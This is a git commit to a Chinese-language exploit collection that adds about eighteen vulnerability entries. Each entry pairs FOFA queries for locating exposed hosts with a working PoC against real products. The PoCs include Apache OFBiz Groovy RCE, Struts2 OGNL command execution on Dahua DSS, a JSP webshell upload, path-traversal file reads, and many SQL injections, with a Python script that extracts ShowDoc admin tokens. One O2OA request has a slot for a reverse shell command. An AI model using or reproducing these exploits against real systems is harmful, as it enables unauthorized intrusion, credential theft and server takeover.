6.5更新漏洞

This commit is contained in:
wy876 2024-06-05 10:17:32 +08:00
parent 3e915b09e9
commit 43899d1536
20 changed files with 602 additions and 0 deletions

View File

@ -0,0 +1,22 @@
## Apache-OFBiz存在路径遍历导致RCE漏洞(CVE-2024-36104)
Apache OFBiz是一个电子商务平台用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。是美国阿帕奇Apache基金会的一套企业资源计划ERP系统。该系统提供了一整套基于Java的Web应用程序组件和工具。Apache OFBiz 18.12.14之前版本存在命令执行漏洞该漏洞源于org.apache.ofbiz.webapp.control.ControlFilter类对路径请求URL中的特殊字符如 ;、%2e限制不当导致攻击者能够绕过后台功能点的过滤器验证并通过/webtools/control/ProgramExport接口的编程导出功能执行任意Groovy代码获取系统权限。
## fofa
```
app="Apache_OFBiz"
```
## poc
```
POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1
Host:
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Content-Type: application/x-www-form-urlencoded
groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b
```
![image-20240605095313271](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406050953399.png)

View File

@ -0,0 +1,30 @@
## H3C-CVM-upload接口前台任意文件上传漏洞复现
H3C CVM /cas/fileUpload/upload接口存在任意文件上传漏洞未授权的攻击者可以上传任意文件获取 webshell控制服务器权限读取敏感信息等。
## fofa
```
app="H3C-CVM"
```
## poc
```
POST /cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/a.jsp&name=123 HTTP/1.1
Host: your-ip
Content-Range: bytes 0-10/20
Referer: http://your-ip/cas/login
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
<%out.println("test");%>
```
![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406040902939.webp)
访问文件路径
```
/cas/js/lib/buttons/a.jsp
```

View File

@ -0,0 +1,22 @@
## HSC-Mailinspector-loader.php存在任意文件读取漏洞(CVE-2024-34470)
HSC Mailinspector是一款远程电子邮件检查工具支持POP3/IMAP4协议。它允许用户远程扫描最新邮件并进行浏览、垃圾邮件排除、编辑、删除等操作无需实际登录邮箱。由于HSC Mailinspector的/public/loader.php文件存在的路径遍历漏洞path参数无法正确筛选传递的文件和目录是否为webroot的一部分从而使未经身份验证的攻击者能够读取服务器上的任意文件。
## fofa
```
body="mailinspector/public"
```
## poc
```
GET /mailinspector/public/loader.php?path=../../../../../../../etc/passwd HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
```
![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406041239536.webp)

View File

@ -0,0 +1,17 @@
## Minio-verify信息泄露(CVE-2023-28432)
MinIO中存在一处信息泄露漏洞由于Minio集群进行信息交换的9000端口在未经配置的情况下通过发送特殊HPPT请求进行未授权访问进而导致MinIO对象存储的相关环境变量泄露环境变量中包含密钥信息。泄露的信息中包含登录账号密码。
## fofa
```
(banner="MinIO" || header="MinIO" || title="MinIO Browser") && country="CN"
```
## poc
```
/minio/bootstrap/v1/verify
```
![image-20240604123832575](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406041238644.png)

View File

@ -0,0 +1,56 @@
## O2OA远程命令执行(CVE-2022-22916)
O2OA是一个基于J2EE分布式架构集成移动办公、智能办公支持私有化部署自适应负载能力的能够很大程度上节约企业软件开发成本的基于AGPL协议开放源代码的企业信息化系统需求定制开发平台解决方案。 通过 /x_program_center/jaxrs/invoke 发现 O2OA v6.4.7 包含一个远程代码执行 (RCE) 漏洞。
## fofa
```
app="兰德网络-O2OA"
```
## poc
登录账号 xadmin/o2 获取Authorization
O2OA开发平台默认的超级管理员账号为xadmin密码为o2oa@2022
第一步
```
POST /x_program_center/jaxrs/invoke?v=6.3 HTTP/1.1
Host: 123.58.236.76:33455
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Authorization: 你的Authorization
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 475
{"name":"aodsec","id":"aodsec","alias":"","description":"","isNewInvoke":true,"text":"\nvar p = java.lang.Runtime.getRuntime().exec('反弹shell命令');\nvar sc = new java.util.Scanner(p.getInputStream(),\"GBK\").useDelimiter(\"\\\\A\");\nvar result = sc.hasNext() ? sc.next() : \"\";\nsc.close();","enableToken":false,"enable":true,"remoteAddrRegex":"","lastStartTime":"","lastEndTime":"","validated":true}
```
```
第二步:
POST /x_program_center/jaxrs/invoke/aodsec/execute?v=6.3 HTTP/1.1
Host: 123.58.236.76:43953
Content-Length: 0
Accept: text/html,application/json,*/*
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN
Authorization: 你的Authorization
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Content-Type: application/json; charset=UTF-8
Origin: http://123.58.236.76:43953
Referer: http://123.58.236.76:43953/x_desktop/index.html
Accept-Encoding: gzip, deflate
Cookie:
Connection: close
```
![image-20240603164914487](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406031649581.png)
![image-20240603164922557](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406031649610.png)

View File

@ -0,0 +1,29 @@
## OrangeHRM-viewProjects接口存在SQL注入漏洞(CVE-2024-36428)
OrangeHRM 这个漏洞是因为在处理用户输入时,没有对输入进行适当的清理或转义,导致攻击者可以通过输入恶意构造的数据来操作或篡改后端数据库的查询。
## fofa
```
app="OrangeHRM-产品"
```
## poc
```
GET /orangehrm-3.3.3/orangehrm-3.3.3/symfony/web/index.php/admin/viewProjects?sortField=customerName&sortOrder=ASC;SELECT%20SLEEP(5) HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Loggedin=True; CookieLanguageName=ZH-CN; CookieAuthType=0; PHPSESSID=c1g00j77qdi2td1cou2qeua321
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
```
![image-20240604124126459](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406041241517.png)

View File

@ -1,6 +1,27 @@
# 漏洞收集
收集整理漏洞EXP/POC,大部分漏洞来源网络目前收集整理了600多个poc/exp善用CTRL+F搜索
## 2024.06.05 新增漏洞
- Symfony-app_dev.php信息泄露漏洞
- 泛微OA-E-cology8-SptmForPortalThumbnail.jsp任意文件读取漏洞
- O2OA远程命令执行(CVE-2022-22916)
- 大华DSS城市安防监控平台login_init.action接口存在Struct2-045命令执行漏洞
- H3C-CVM-upload接口前台任意文件上传漏洞复现
- 用友NC-pagesServlet存在SQL注入
- 宏景HCM-pos_dept_post存在SQL注入漏洞
- 迈普多业务融合网关send_order.cgi存在命令执行漏洞
- HSC-Mailinspector-loader.php存在任意文件读取漏洞(CVE-2024-34470)
- Minio-verify信息泄露(CVE-2023-28432)
- OrangeHRM-viewProjects接口存在SQL注入漏洞(CVE-2024-36428)
- ShowDoc3.2.5存在SQL注入漏洞
- mysql2原型污染漏洞(CVE-2024-21512)
- 亿赛通-电子文档安全管理系统SaveCDGPermissionFromGFOA接口存在sql注入漏洞
- Apache-OFBiz存在路径遍历导致RCE漏洞(CVE-2024-36104)
- 飞企互联-FE企业运营管理平台treeXml.jsp存在SQL注入漏洞
- 泛微E-Office-json_common.phpSQL注入漏洞
- 泛微E-Office系统login_other.php存在sql注入漏洞
## 2024.06.02 新增漏洞
- 海康威视综合安防download存在任意文件读取漏洞

View File

@ -0,0 +1,103 @@
## ShowDoc3.2.5存在SQL注入漏洞
ShowDoc 是基于thinkPHP开发的开源文档管理系统支持使用 Markdown 语法书写API文档、数据字典、在线Excel文档等功能。
ShowDoc 3.2.6之前版本存在sql注入漏洞在 Showdoc 的/server/index.php?s\=/api/item/pwd路径的item_id参数存在拼接执行逻辑攻击者可利用 sql 注入爆破用户的 user_token进而窃取管理员凭据获取所有API文档、附件及LDAP等配置信息。
## fofa
```
app="ShowDoc"
```
## poc
```python
import argparse
import ddddocr
import requests
import onnxruntime
from urllib.parse import urljoin
onnxruntime.set_default_logger_severity(3)
table = '0123456789abcdef'
proxies = {'http': 'http://127.0.0.1:8085'}
ocr = ddddocr.DdddOcr()
ocr.set_ranges(table)
class RetryException(Exception):
pass
def retry_when_failed(func):
def retry_func(*args, **kwargs):
while True:
try:
return func(*args, **kwargs)
except RetryException:
continue
except Exception as e:
raise e
return retry_func
def generate_captcha(base: str):
data = requests.get(f"{base}?s=/api/common/createCaptcha").json()
captcha_id = data['data']['captcha_id']
response = requests.get(f'{base}?s=/api/common/showCaptcha&captcha_id={captcha_id}')
data = response.content
result = ocr.classification(data)
return captcha_id, result
@retry_when_failed
def exploit_one(base: str, current: str, ch: str) -> str:
captcha_id, captcha_text = generate_captcha(base)
data = requests.get(base, params={
's': '/api/item/pwd',
'page_id': '0',
'password': '1',
'captcha_id': captcha_id,
'captcha': captcha_text,
'item_id': f"aa') UNION SELECT 1,1,1,1,1,(SELECT 1 FROM user_token WHERE uid = 1 AND token LIKE '{current}{ch}%' LIMIT 1),1,1,1,1,1,1 FROM user_token; -- "
}).json()
if data['error_code'] == 0:
return ch
elif data['error_code'] == 10010:
return ''
elif data['error_code'] == 10206:
raise RetryException()
else:
print(f'error: {data!r}')
raise Exception('unknown exception')
def main():
parser = argparse.ArgumentParser(description='Showdoc 3.2.5 SQL injection')
parser.add_argument('-u', '--url', type=str, required=True)
args = parser.parse_args()
target = urljoin(args.url, '/server/index.php')
res = ''
for i in range(64):
r = ''
for ch in list(table):
r = exploit_one(target, res, ch)
if r:
res += ch
break
print(f'Current result: {res}')
if not r:
break
if __name__ == '__main__':
main()
```
![image-20240605084947972](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406050849021.png)

View File

@ -0,0 +1,11 @@
## Symfony-app_dev.php信息泄露漏洞
Sensio Labs Symfony是法国Sensio Labs公司的一套免费的、基于MVC架构的PHP开发框架。该框架提供常用的功能组件及工具可用于快速创建复杂的WEB程序。
## poc
```
/app_dev.php/_profiler/open?file=app/config/parameters.yml
```
![image-20240603090612812](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406030906924.png)

View File

@ -0,0 +1,33 @@
## mysql2原型污染漏洞(CVE-2024-21512)
MySQL2 3.9.8 错误的版本中存在一个缺陷。该问题是由于使用 nestTables 时提交的字段和表用户输入清理不当而导致的实例污染。
## poc
```
const mysql = require('mysql2');
const connection = mysql.createConnection({
host: '127.0.0.1',
user: 'root',
database: 'test',
password: 'root',
});
let query_data = {
sql: `SELECT CAST('{"admin":true}' AS JSON)_proto__;`,
nestTables: "_",
};
connection.query(query_data, (err, results) => {
if (err) throw err;
console.log(Object.getPrototypeOf(results[0]));
console.log(results[0].admin);
});
connection.end();
```
## 漏洞来源
- https://security.snyk.io/vuln/SNYK-JS-MYSQL2-6861580

View File

@ -0,0 +1,25 @@
## 亿赛通-电子文档安全管理系统SaveCDGPermissionFromGFOA接口存在sql注入漏洞
由于亿赛通电子文档安全管理系统SaveCDGPermissionFromGFOA处fileID对传入的数据没有预编译和充足的校验导致该接口存在SQL注入漏洞未授权的攻击者可获取数据库敏感信息。
## fofa
```
app="亿赛通-电子文档安全管理系统"
```
## poc
```
POST /CDGServer3/js/../SaveCDGPermissionFromGFOA HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Length: 39
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
fileId=1';WAITFOR DELAY '0:0:2'--&pis=1
```

View File

@ -0,0 +1,26 @@
## 大华DSS城市安防监控平台login_init.action接口存在Struct2-045命令执行漏洞
大华DSS安防监控系统平台采用Apache Struts2作为网站应用框架。/portal/login_init.action接口存在远程命令执行漏洞攻击者可以通过在上传文件时修改HTTP请求标头中的Content Type值来触发该漏洞然后执行该漏洞。系统命令以获取服务器权限。
## fofa
```
app="dahua-DSS"
```
## poc
```
POST /portal/login_init.action HTTP/1.1
Host:
Connection: close
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_333
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 0
```
![image-20240604085526465](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406040855573.png)

View File

@ -0,0 +1,25 @@
## 大华DSS城市安防监控平台user_toLoginPage.action接口存在Struct2-045命令执行漏洞
大华DSS安防监控系统平台采用Apache Struts2作为网站应用框架。/config/user_toLoginPage.action接口存在远程命令执行漏洞攻击者可以通过在上传文件时修改HTTP请求标头中的Content Type值来触发该漏洞然后执行该漏洞。系统命令以获取服务器权限。
## fofa
```
app="dahua-DSS"
```
## poc
```
POST /config/user_toLoginPage.action HTTP/1.1
Host:
Connection: close
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_333
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 0
```
![image-20240604085832753](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406040858859.png)

View File

@ -0,0 +1,58 @@
## 宏景HCM-pos_dept_post存在SQL注入漏洞
宏景HCM pos_dept_post对传入的数据没有预编译和充足的校验导致该接口存在SQL注入漏洞未授权的攻击者可获取数据库敏感信息。
## fofa
```
app="HJSOFT-HCM"
```
## poc
```
POST /templates/attestation/../../pos/roleinfo/pos_dept_post HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 61
usertable=h00&usernumber=1&i9999=-1';WAITFOR DELAY '0:0:3'--+
```
## **Yaml**
```
id: hongjing-hcm-pos_dept_post-sql-injection
info:
name: 宏景HCM-pos_dept_post-delay-sql注入漏洞
author: onewin
severity: high
description: 宏景HCM-pos_dept_post-delay-sql注入漏洞
metadata:
fofa-query: app="HJSOFT-HCM"
tags: hongjing,hcm,fileread
http:
- raw:
- |-
@timeout: 30s
POST /templates/attestation/../../pos/roleinfo/pos_dept_post HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 61
usertable=h00&usernumber=1&i9999=-1';WAITFOR DELAY '0:0:3'--+
max-redirects: 3
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=3'#nuclei默认响应超时时间为5秒
```

View File

@ -0,0 +1,26 @@
## 泛微E-Office-json_common.phpSQL注入漏洞
作为协同管理软件行业的领军企业,泛微有业界优秀的协同管理软件产品。在企业级移动互联大潮下,泛微发布了全新的以“移动化 社交化 平台化 云端化”四化为核心的全一代产品系列其中泛微e-office为企业办公提供丰富应用覆盖常见协作场景开箱即用。满足人事、行政、财务、销售、运营、市场等不同部门协作需求帮助组织高效人事管理。系统 json_common.php 文件存在SQL注入漏洞容易导致数据泄露以及被远控。
## fofa
```
app="泛微-EOffice"
```
## poc
```
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
```

View File

@ -0,0 +1,17 @@
## 泛微E-Office系统login_other.php存在sql注入漏洞
泛微E-Office系统/E-mobile/Data/login_other.php?diff=sync&auth=存在sql注入漏洞
## fofa
```
app="泛微-EOffice"
```
## poc
```
/E-mobile/Data/login_other.php?diff=sync&auth={"auths":[{"value":"-1' UNION SELECT 1,2,md5(123456),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23"}]}
```
![image-20240605101147774](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406051011840.png)

View File

@ -0,0 +1,17 @@
## 泛微OA-E-cology8-SptmForPortalThumbnail.jsp任意文件读取漏洞
泛微 e-cology8 的 SptmForPortalThumbnail.jsp 文件中的 preview 未进行安全过滤,攻击者可通过该漏洞读取泄露源码、数据库配置文件等等,导致网站处于极度不安全状态。
## fofa
```
app="泛微-OAe-cology"
```
## poc
```
/portal/SptmForPortalThumbnail.jsp?preview=../ecology/WEB-INF/prop/weaver.properties
```
![image-20240603134349033](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406031343093.png)

View File

@ -0,0 +1,24 @@
## 用友NC-pagesServlet存在SQL注入
用友NC是由用友公司开发的一套面向大型企业和集团型企业的管理软件产品系列。这一系列产品基于全球最新的互联网技术、云计算技术和移动应用技术旨在帮助企业创新管理模式、引领商业变革。用友NC /portal/pt/servlet/pagesServlet/doPost接口存在SQL注入漏洞攻击者通过利用SQL注入漏洞获取数据库敏感信息。
## fofa
```
app="用友-UFIDA-NC"
```
## poc
```
GET /portal/pt/servlet/pagesServlet/doPost?pageId=login&pk_group=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host:
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```
![image-20240604122921130](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406041229285.png)

View File

@ -0,0 +1,22 @@
## 迈普多业务融合网关send_order.cgi存在命令执行漏洞
迈普多业务融合网关是迈普通信技术股份有限公司自主研发的多业务无线融合网关,拥有融合网关功能、精准流控、上网行为管理、智能选路…等强大功能,并支持对接迈普云平台,实现远程运维和集中管理,很好的满足了医疗/教育等场景要求的全面一体化的网络需求。迈普多业务融合网关send_order.cgi存在命令执行漏洞未经身份验证的远程攻击者可利用此漏洞执行任意系统指令从而获取服务器权限。
## fofa
```
title=="迈普多业务融合网关"
```
## poc
```
POST /send_order.cgi?parameter=operation HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64MHhzZWM=; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
{"opid":"1","name":";id;uname -a;","type":"rest"}
```

View File

@ -0,0 +1,18 @@
## 飞企互联-FE企业运营管理平台treeXml.jsp存在SQL注入漏洞
飞企互联-FE企业运营管理平台 treeXml.jsp 接口存在SQL注入漏洞未经授权攻击者可通过该漏洞获取数据库敏感信息。
## fofa
```
app="FE-协作平台"
```
## poc
```
GET /sys/treeXml.js%70?menuName=1';WAITFOR+DELAY+'0:0:5'--&type=function HTTP/1.1
Host: your-ip
```
![image-20240605095623810](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406050956915.png)